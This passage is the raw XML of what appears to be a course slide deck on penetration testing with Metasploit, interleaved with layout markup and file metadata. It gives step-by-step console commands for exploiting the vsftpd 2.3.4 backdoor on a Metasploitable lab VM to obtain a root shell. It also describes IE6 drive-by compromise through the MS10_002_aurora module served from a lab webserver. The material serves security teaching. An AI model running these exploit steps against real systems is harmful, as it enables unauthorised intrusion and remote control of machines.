              <a:t>the vulnerable IE6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>connects to the malicious webserver (http://10.0.2.15),  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>it will be compromised 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0307"/>
            <a:ext cx="63341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" y="4191001"/>
            <a:ext cx="9144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17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This vulnerability is also IE6’s bug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GB" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Another example of IE6 vulnerable to ‘Drive-By Download’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783713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endParaRPr lang="en-GB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295400"/>
            <a:ext cx="7105650" cy="3743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73" y="5495925"/>
            <a:ext cx="4686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Comprehensive Penetration Testing Software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Already installed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Command line: #msfconsole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A good Youtube tutorial on compromising Metasploitable:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=UKppQMwoMdk</a:t>
            </a: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1:  search for exploit module to vsftpd vuln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search vsftpd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Rank:  “great” or “excellent” are good candidates for attack!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648200"/>
            <a:ext cx="83232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8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Attack: MS10_002_aurora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81013" y="1143000"/>
            <a:ext cx="8229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When the vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>IE6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>connects to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the malicious webserver with the specific URL (http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>10.0.2.15:8080/Qik8mzO),  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>it will be compromised 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166937"/>
            <a:ext cx="8020050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4800600"/>
            <a:ext cx="589796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5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2:  use the exploit module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use exploit/unix/ftp/vsftpd_234_backdoor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3:  Choose attacking payload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Meaning: remote shell? Remote desktop (vnc)? Remote ftp? Remote execute a command?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show payloads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446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81089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84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4:  set payload to use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set payload cmd/unix/interact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5: fill in missing parameters before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Remote IP? Local IP? Local port? ….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&gt; show options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Result: RHOST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Is missing, we need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specify remote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Host IP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47875"/>
            <a:ext cx="5648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41675"/>
            <a:ext cx="449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93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7:  Filling in missing parameters/options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set RHOST 192.168.0.109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Step 8: Issue Attack!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="200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msf exploit(vsftpd_234_backdoor) &gt; exploit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Now we have a remote shell on the target with root previllege!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352800"/>
            <a:ext cx="84772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7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Metasploit: vsftpd in Metasploitable Linux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42900" y="12954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Now you can try the other 10 critical vulnerabilities in Metasploitable!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Summary of Operations of Metasploit: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Use Nmap or Nessus to find target vulnerabilities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Search the exploit module for the vulnerability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Use the attack module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Show available payloads in the exploit module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Set payload you want to use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Show parameters needed for the attack to go through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Set the missing parameters (remote IP, ….)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r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400"/>
              <a:t>Execute “exploit”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="FreeSans" pitchFamily="32" charset="0"/>
              <a:buAutoNum type="arabicPeriod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400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3721224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47800" y="2514600"/>
            <a:ext cx="740727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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> to Exploit Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>  Virtual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6952</TotalTime>
  <Words>1763</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>339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Gulim</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>AlBattar</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>FreeSans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czou</cp:lastModifiedBy>
  <cp:revision>233</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-08-21T01:52:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-08T18:08:41Z</dcterms:modified>
</cp:coreProperties>
</file>